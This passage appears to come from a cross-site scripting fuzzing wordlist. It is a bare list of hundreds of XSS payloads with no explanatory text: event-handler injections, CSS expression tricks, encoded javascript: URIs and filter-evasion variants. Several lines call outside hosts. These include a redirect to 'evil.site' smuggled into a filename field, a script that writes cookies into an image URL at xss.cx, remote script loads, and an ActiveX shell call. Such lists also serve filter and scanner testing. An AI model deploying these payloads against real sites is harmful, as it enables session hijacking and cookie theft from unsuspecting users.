?></h1>\n<style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style>\n<style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa\n<style/onload    =    !-confirm&#x28;1&#x29;>\n<style/onload=confirm(1)>\n<style/onload=\"javascript:if('[object Object]'=={}&&1==[1])confirm(1);\">\n<style/onload=&lt;!--&#09;&gt;&#10;confirm&#10;&lpar;1&rpar;>\n<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n<style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>\n<///style///><span %2F onmousemove='confirm&lpar;1&rpar;'>SPAN\n<style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style>\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<svg contentScriptType=text/vbs><script>XSS\n<svg id=1 onload=confirm(1)> \n<svg onload=confirm(1)\n\"><svg onload=\"confirm(7)\">\n<svg onload=\"confirm(7)\">\n<svg onload=eval(URL)>\n<svg onload=eval(document.cookie)>\n<svg onload=eval(window.name)>\n<svg xml:base=\"data:text/html,<script>confirm(1)</script>\"><a xlink:href=\"#\"><circle r=\"40\"></circle></a></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:confirm(1)\"></g></svg>\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\"><a><circle r=100 /><animate attributeName=\"xlink:href\" values=\";javascript:confirm(1)\" begin=\"0s\" dur=\"0.1s\" fill=\"freeze\"/>\n<svg></ y=\"><x\" onload=confirm(4)>\n<svg><doh onload=confirm(1)>\n<svg><image x:href=\"data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E\">\n\"<svg/onload=confirm(0);prompt(0);>\"\n<svg/onload=confirm(0);prompt(0);>\n<svg/onload=confirm(1)\n\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>\n\"\\\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>\"\n<svg/onload='javascript0x00:void(0)%00?void(0)&colon;confirm(1)'>\n\"<svg/onload=prompt(0);>\"\n<svg/onload=prompt(0);>\n\"<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\"\n\"\\\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\",\n<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\n><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>\n<svg/onload=window.onerror=confirm;throw/5/;//\n<svg/onload=window.onerror=confirm;throw/XSS/;//\n<svg/onload=window.onerror=confirm;throw/XSS/;//\"\n<svg><script ?>confirm(1)\n<svg><script ?>confirm(1);\n<svg><script onlypossibleinopera:-)> confirm(1)\n<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js'\n<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script\n<svg><script><![CDATA[\\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>\n\"/><svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>\n<svg><script>confirm&#40/1/&#41</script>\n<svg><script>confirm(\"&quot;);confirm('yes')//no\")</script>\n<svg><script>a<svg//onload=confirm(2) />lert(1)</script>\n<svg><script>location&equals;&#60&#62javascript&amp;#x3A;confirm(1)&#60&#33&#47&#62;</script>\n<svg><script>/*&midast;&sol;confirm(3)&sol;&sol;*/</script></svg>\n<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n<svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg>\n<svg><style>&ltimg src=x onerror=confirm(1)&gt</svg>\n</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm&#x28;1&#x29;\n?t=confirm(1)&k7=\"><svg/t='&k8='onload='/&k9=/+eval(t)'\ntest=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script&notbot=UzXGjMCo8AoAAFUcKTEAAAAN\n<textarea autofocus onfocus=confirm(3)>\n<textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea>\n<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>\n\"/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea name='file\"; filename=\"test.<img src=a onerror=document&amp;#46;location&amp;#61;&amp;#34;http:&amp;#47;&amp;#47;evil&amp;#46;site&amp;#34;>'>\n\"<textarea onmousemove='confirm(1);'>\"\n<textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> --> \n</title><frameset><frame src=\"data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>\">\n</title><frameset><frame src=\"data:text/html,<script>confirm(1)</script>\">\n<ul><li><svg onload=\"confirm(1)\"></li></ul>\n<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:confirm(document.location);\">\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>?\n\"<video src=. onerror=prompt(0)>\"\n<video src=. onerror=prompt(0)>\n<video src=\"x\" onloadstart=\"confirm(1)\">\n<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23\n<video><source o?UTF-8?Q?n?error=\"confirm(1)\">\n<x data-bind=\".:confirm(1)\">\n<x data-bind=\".:&#x5cu0061lert(1)\">\n<x onload'=confirm(1)\n&#x000003C\n&#x000003C;\n&#x000003E\n&#x000003E;\n&#x000003c\n&#x000003c;\n&#x000003e\n&#x000003e;\n&#x00003C\n&#x00003C;\n&#x00003E\n&#x00003E;\n&#x00003c\n&#x00003c;\n&#x00003e\n&#x00003e;\n&#x0003C\n&#x0003C;\n&#x0003E\n&#x0003E;\n&#x0003c\n&#x0003c;\n&#x0003e\n&#x0003e;\n&#x003C\n&#x003C;\n&#x003E\n&#x003E;\n&#x003c\n&#x003c;\n&#x003e\n&#x003e;\n&#x03C\n&#x03C;\n&#x03E\n&#x03E;\n&#x03c\n&#x03c;\n&#x03e\n&#x03e;\n&#x3C\n&#x3C;\n\\x3C\n&#x3E\n&#x3E;\n\\x3E\n&#x3c\n&#x3c;\n\\x3c\n&#x3e\n&#x3e;\n\\x3e\n<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>\n<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>\n<xmp><img alt=\"</xmp><img src=xx:x onerror=confirm(1)//\">\nxss--><!--<script>xss\nxâ€</title><img src%3dx onerror%3dconfirm(1)>\n@\"><img src=x/onerror=confirm(1)>xss\n<script>x=new ActiveXObject(\"WScript.Shell\");x.run('calc');</script>\n\"><<x>script>confirm(2)<<x>/<x>script>\n<img src=x onerror=\"document.location='http:&#x2F;&#x2F;xss.cx'\";>\n!#$%&'*+-/=?^_`{}|~@xss.cx\n~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('\n<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>\n<style/>&lt;/style&gt;&lt;img src=1 onerror=confirm(1)&gt;</style>\n<script>\nx=\"<%\";\n</script>\n<div title=\"%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=confirm(1)&gt;\"></div>\n<? foo=\"><script>confirm(1)</script>\">\ndata:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1)\n'\">><marquee><img src=x onerror=confirm(1)></marquee>\n<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>\n\"><b/onclick=\"javascript:window.window.window['confirm'](1)\">bold\n<body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'>\n<IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>\n%uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e\n<script>``.constructor.constructor`confirm\\`1\\````</script>\neval(\"\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29â€)\n<script>var%20x%20=%20â€œaâ€;%20confirm(1);//â€;</script>\n<source srcset=\"x\"><img onerror=\"confirm(5)\"></picture>\n<svg><script>confirm&DiacriticalGrave;1&DiacriticalGrave;<p><svg><script>confirm&grave;1&grave;<p>\n<script>``.constructor.constructor`confirm\\`1\\````</script>\n<i/style=x=x/**/(confirm(1))('\\')expression\\')>\n<i/style=x=x/**/n(confirm(1))('\\')expressio\\')>\n<div style='x:anytext/**/xxxx/**/n(confirm(1)) (\"\\\"))))))expressio\\\")'>aa</div> //\n<script>write(â€œ<img/src=//xss.cx/?â€+cookie.replace(/\\s/g,\"\")+â€œ>â€)></script>\n<base href=\"javascript:\\\"> <a href=\"//%0aconfirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//%0a%0dconfirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//%00confirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//xss.cx/xss.js\">XSS</a>\n<script src=\"//â’•â‚¨\"></script>)\n<anything onmouseover=javascript:confirm(1)>\n<%00/title>\n<\"\"/title>\n</title\"\">\n</title id=\"\">\n<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>\n<img src=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\">\n<a href=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"><img src=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"></a>\n\">    \"><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a>    \"><iframe src=http://xss.cx onload=confirm(8) <\n% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%\n\"><svg/onload=prompt(1)>\n\"onresize=prompt(1)>\n<svg/onload=prompt(1)\n<svg><script>prompt&#40;1)<b>\n<svg><script>prompt&#40;1)</script>\n<script>eval.call`${'prompt\\x281)'}`</script>\n<script>prompt.call`${1}`</script>\n--!><svg/onload=prompt(1)\n<p class=\"comment\" title=\"\"><svg/a=\"></p>\n<p class=\"comment\" title=\"\"onload='/*\"></p>\n<p class=\"comment\" title=\"*/prompt(1)'\"></p>\n\"><svg/a=#\"onload='/*#*/prompt(1)'\n\"><script x=#\"async=#\"src=\"//â’›â‚¨\n[U+2028]prompt(1)[U+2028]-->\n<Å¿vg><Å¿cript/href=//â’•â‚¨>\n<Å¿cript/async/src=//â’›â‚¨>\n<img src=\"\"><SCRIPT/ASYNC/SRC=\"/ã€³â’›â‚¨\">\n\"><script>`#${prompt(1)}#`</script>\n<script>alert(123)</script>\n&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;\n<img src=x onerror=alert(123) />\n<svg><script>123<1>alert(123)</script> \n\"><script>alert(123)</script>\n'><script>alert(123)</script>\n><script>alert(123)</script>\n</script><script>alert(123)</script>\n< / script >< script >alert(123)< / script >\n onfocus=JaVaSCript:alert(123) autofocus \n\" onfocus=JaVaSCript:alert(123) autofocus \n' onfocus=JaVaSCript:alert(123) autofocus \n＜script＞alert(123)＜/script＞\n<sc<script>ript>alert(123)</sc</script>ript>\n--><script>alert(123)</script>\n\";alert(123);t=\"\n';alert(123);t='\nJavaSCript:alert(123)\n;alert(123);\nsrc=JaVaSCript:prompt(132)\n\"><script>alert(123);</script x=\"\n'><script>alert(123);</script x='\n><script>alert(123);</script x=\n\" autofocus onkeyup=\"javascript:alert(123)\n' autofocus onkeyup='javascript:alert(123)\n<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n'`\"><\\x3Cscript>javascript:alert(1)</script>        \n'`\"><\\x00script>javascript:alert(1)</script>\nABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF\n<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>\n\"`'><script>\\x3Bjavascript:alert(1)</script>\n\"`'><script>\\x0Djavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>\n\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x09javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>\n\"`'><script>\\x00javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>\n\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>\n\"`'><script>\\x0Cjavascript:alert(1)</script>\n\"`'><script>\\x2Bjavascript:alert(1)</script>\n\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>\n\"`'><script>-javascript:alert(1)</script>\n\"`'><script>\\x0Ajavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>\n\"`'><script>\\x7Ejavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>\n\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>\n\"`'><script>\\xC2\\x85javascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x21javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>\n\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>\n\"`'><script>\\x0Bjavascript:alert(1)</script>\n\"`'><script>\\x20javascript:alert(1)</script>\n\"`'><script>\\xC2\\xA0javascript:alert(1)</script>\n<img \\x00src=x onerror=\"alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x12src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x10src=x onerror=\"javascript:alert(1)\">\n<img\\x13src=x onerror=\"javascript:alert(1)\">\n<img\\x32src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x34src=x onerror=\"javascript:alert(1)\">\n<img \\x39src=x onerror=\"javascript:alert(1)\">\n<img \\x00src=x onerror=\"javascript:alert(1)\">\n<img src\\x09=x onerror=\"javascript:alert(1)\">\n<img src\\x10=x onerror=\"javascript:alert(1)\">\n<img src\\x13=x onerror=\"javascript:alert(1)\">\n<img src\\x32=x onerror=\"javascript:alert(1)\">\n<img src\\x12=x onerror=\"javascript:alert(1)\">\n<img src\\x11=x onerror=\"javascript:alert(1)\">\n<img src\\x00=x onerror=\"javascript:alert(1)\">\n<img src\\x47=x onerror=\"javascript:alert(1)\">\n<img src=x\\x09onerror=\"javascript:alert(1)\">\n<img src=x\\x10onerror=\"javascript:alert(1)\">\n<img src=x\\x11onerror=\"javascript:alert(1)\">\n<img src=x\\x12onerror=\"javascript:alert(1)\">\n<img src=x\\x13onerror=\"javascript:alert(1)\">\n<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">\n<img src=x onerror=\\x09\"javascript:alert(1)\">\n<img src=x onerror=\\x10\"javascript:alert(1)\">\n<img src=x onerror=\\x11\"javascript:alert(1)\">\n<img src=x onerror=\\x12\"javascript:alert(1)\">\n<img src=x onerror=\\x32\"javascript:alert(1)\">\n<img src=x onerror=\\x00\"javascript:alert(1)\">\n<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>\n<img src=\"x` `<script>javascript:alert(1)</script>\"` `>\n<img src onerror /\" '\"= alt=javascript:alert(1)//\">\n<title onpropertychange=javascript:alert(1)></title><title title=>\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">\n<!--[if]><script>javascript:alert(1)</script -->\n<!--[if<img src=x onerror=javascript:alert(1)//]> -->\n<script src=\"/\\%(jscript)s\"></script>\n<script src=\"\\\\%(jscript)s\"></script>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n<IMG SRC=# onmouseover=\"alert('xxs')\">\n<IMG SRC= onmouseover=\"alert('xxs')\">\n<IMG onmouseover=\"alert('xxs')\">\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=\"jav   ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG 